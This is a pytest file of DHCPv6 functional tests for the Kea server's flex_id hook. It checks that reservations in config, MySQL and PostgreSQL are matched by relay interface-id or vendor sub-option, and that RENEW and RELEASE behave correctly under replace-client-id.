def test_v6_hooks_flexid_mysql_1():
    """flex-id reservation stored in MySQL is matched via the relay interface-id."""
    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.add_line({"host-reservation-identifiers": ["flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    srv_control.add_parameter_to_hook(1, "identifier-expression", "relay6[0].option[18].hex")
    srv_control.enable_db_backend_reservation("MySQL")
    # "706f727431323334" is the hex encoding of "port1234" — TODO confirm against DSL docs.
    srv_control.new_db_backend_reservation("MySQL", "flex-id", "706f727431323334")
    srv_control.update_db_backend_reservation("hostname", "reserved-hostname", "MySQL", 1)
    srv_control.update_db_backend_reservation("dhcp6_subnet_id", 1, "MySQL", 1)
    srv_control.ipv6_address_db_backend_reservation("3000::f", "$(EMPTY)", "MySQL", 1)
    srv_control.upload_db_reservation("MySQL")
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    misc.test_procedure()
    srv_msg.client_does_include("Client", "client-id")
    srv_msg.client_does_include("Client", "IA-NA")
    srv_msg.client_send_msg("SOLICIT")
    srv_msg.client_sets_value("RelayAgent", "ifaceid", "port1234")
    srv_msg.client_does_include("RelayAgent", "interface-id")
    srv_msg.create_relay_forward()

    misc.pass_criteria()
    srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
    srv_msg.response_check_include_option(18)
    srv_msg.response_check_include_option(9)
    srv_msg.response_check_option_content(9, "Relayed", "Message")
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, "sub-option", 5)
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_mysql_2():
    """flex-id reservation stored in MySQL is matched via vendor sub-option 1026."""
    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    srv_control.add_parameter_to_hook(1, "identifier-expression", "vendor[4491].option[1026].hex")
    srv_control.enable_db_backend_reservation("MySQL")
    srv_control.new_db_backend_reservation("MySQL", "flex-id", "01:02:03:04:05:06")
    srv_control.update_db_backend_reservation("hostname", "reserved-hostname", "MySQL", 1)
    srv_control.update_db_backend_reservation("dhcp6_subnet_id", 1, "MySQL", 1)
    srv_control.ipv6_address_db_backend_reservation("3000::f", "$(EMPTY)", "MySQL", 1)
    srv_control.upload_db_reservation("MySQL")
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    misc.test_procedure()
    srv_msg.client_sets_value("Client", "enterprisenum", "4491")
    srv_msg.client_does_include("Client", "vendor-class")
    srv_msg.add_vendor_suboption("Client", 1026, "01:02:03:04:05:06")
    srv_msg.client_does_include("Client", "vendor-specific-info")
    srv_msg.client_does_include("Client", "client-id")
    srv_msg.client_does_include("Client", "IA-NA")
    srv_msg.client_send_msg("SOLICIT")

    misc.pass_criteria()
    srv_msg.send_wait_for_message("MUST", "ADVERTISE")
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, "sub-option", 5)
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_pgsql_1():
    """flex-id reservation stored in PostgreSQL is matched via the relay interface-id."""
    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    srv_control.add_parameter_to_hook(1, "identifier-expression", "relay6[0].option[18].hex")
    srv_control.enable_db_backend_reservation("PostgreSQL")
    # "706f727431323334" is the hex encoding of "port1234" — TODO confirm against DSL docs.
    srv_control.new_db_backend_reservation("PostgreSQL", "flex-id", "706f727431323334")
    srv_control.update_db_backend_reservation("hostname", "reserved-hostname", "PostgreSQL", 1)
    srv_control.update_db_backend_reservation("dhcp6_subnet_id", 1, "PostgreSQL", 1)
    srv_control.ipv6_address_db_backend_reservation("3000::f", "$(EMPTY)", "PostgreSQL", 1)
    srv_control.upload_db_reservation("PostgreSQL")
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    misc.test_procedure()
    srv_msg.client_does_include("Client", "client-id")
    srv_msg.client_does_include("Client", "IA-NA")
    srv_msg.client_send_msg("SOLICIT")
    srv_msg.client_sets_value("RelayAgent", "ifaceid", "port1234")
    srv_msg.client_does_include("RelayAgent", "interface-id")
    srv_msg.create_relay_forward()

    misc.pass_criteria()
    srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
    srv_msg.response_check_include_option(18)
    srv_msg.response_check_include_option(9)
    srv_msg.response_check_option_content(9, "Relayed", "Message")
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, "sub-option", 5)
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_pgsql_2():
    """Flex-id reservation in PostgreSQL matched via CableLabs vendor option.

    The flex_id hook evaluates ``vendor[4491].option[1026].hex``.  A client
    sending vendor sub-option 1026 with value 01:02:03:04:05:06 (matching
    the flex-id stored in PostgreSQL) must be offered the reserved address
    3000::f in the ADVERTISE.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.enable_db_backend_reservation('PostgreSQL')
    srv_control.new_db_backend_reservation('PostgreSQL', 'flex-id', '01:02:03:04:05:06')
    srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', 1)
    srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'PostgreSQL', 1)
    srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'PostgreSQL', 1)
    srv_control.upload_db_reservation('PostgreSQL')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT carrying vendor sub-option 1026 equal to the reserved flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid():
    """Full SOLICIT/ADVERTISE + REQUEST/REPLY with ``replace-client-id``.

    With ``replace-client-id: true`` the flex_id hook substitutes the
    evaluated flex-id for the client's DUID as the lease identifier.  The
    client matching the in-config reservation (flex-id 01:02:03:04:05:06)
    must obtain the reserved address 3000::f in both exchanges.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT with the matching vendor sub-option -> reserved address offered.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST the offered address -> lease assigned under the flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_renew():
    """RENEW succeeds with a different DUID but the same flex-id.

    With ``replace-client-id: true`` the lease is keyed on the flex-id, so
    a client that changes its DUID (but keeps vendor sub-option 1026 equal
    to 01:02:03:04:05:06) can still renew the lease for 3000::f: the REPLY
    must NOT carry a zero valid lifetime for the address.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT/ADVERTISE: reserved address offered for the matching flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST/REPLY: lease assigned.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Client with different DUID (same flex-id) tries to renew -> must succeed.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Valid lifetime 0 would mean the renew was rejected; it must be absent.
    srv_msg.response_check_suboption_content(5, 3, 'validlft', 0, expect_include=False)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_renew_failed():
    """RENEW fails with the same DUID but a different flex-id.

    Mirror of test_v6_hooks_flexid_replace_duid_renew: the client keeps its
    DUID but sends a non-matching vendor sub-option 1026, so the lease (keyed
    on flex-id due to ``replace-client-id: true``) is not recognised and the
    REPLY carries the address with valid lifetime 0.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT/ADVERTISE: reserved address offered for the matching flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST/REPLY: lease assigned.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Client with the same DUID and different flex-id tries to renew.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:44:55:66')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('RENEW')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Zero valid lifetime signals the renew was refused for this binding.
    srv_msg.response_check_suboption_content(5, 3, 'validlft', 0)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release():
    """RELEASE succeeds with a different DUID but the same flex-id.

    With ``replace-client-id: true`` the lease is keyed on the flex-id, so a
    client presenting a new DUID but the original vendor sub-option 1026 can
    release the lease for 3000::f: the REPLY must carry status code 0
    (Success) in the IA_NA status sub-option.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT/ADVERTISE: reserved address offered for the matching flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST/REPLY: lease assigned.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Client with different DUID (same flex-id) tries to release -> Success (0).
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('RELEASE')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 0)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release_failed():
    """RELEASE fails with the same DUID but a different flex-id.

    Mirror of test_v6_hooks_flexid_replace_duid_release: the client keeps its
    DUID but sends a non-matching vendor sub-option 1026, so the release is
    rejected with status code 3 (NoBinding).
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT/ADVERTISE: reserved address offered for the matching flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST/REPLY: lease assigned.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Client with the same DUID but different flex-id tries to release
    # (expected result: NoBinding).
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:44:55:66')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('RELEASE')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    # Status code 3 == NoBinding: the lease stays assigned.
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 3)
# NOTE(review): the original scenario also verified the lease file — kept for
# reference, not yet ported to srv_msg.file_contains_line():
# File stored in kea-leases6.csv MUST contain line or phrase: 3000::f,01:02:03:04:05:06,4000,
# File stored in kea-leases6.csv MUST NOT contain line or phrase: 3000::f,01:02:03:04:05:06,0,
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release_mysql():
    """Release with a different DUID, flex-id reservation stored in MySQL.

    Same scenario as test_v6_hooks_flexid_replace_duid_release but the host
    reservation lives in the MySQL backend, with an extra negative check
    first: a SOLICIT carrying a non-matching flex-id must NOT be offered the
    reserved address.
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    # NOTE(review): an in-config reservation is also defined here alongside the
    # MySQL one below — presumably intentional duplication; confirm it is needed.
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.enable_db_backend_reservation('MySQL')
    srv_control.new_db_backend_reservation('MySQL', 'flex-id', '01:02:03:04:05:06')
    srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'MySQL', 1)
    srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'MySQL', 1)
    srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'MySQL', 1)
    srv_control.upload_db_reservation('MySQL')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # Negative check: non-matching flex-id must not get the reserved address.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '11:22:33:44:55:66')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f', expect_include=False)
    # Matching flex-id -> reserved address offered.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST/REPLY: lease assigned.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Client with different DUID (same flex-id) tries to release -> Success (0).
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('RELEASE')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
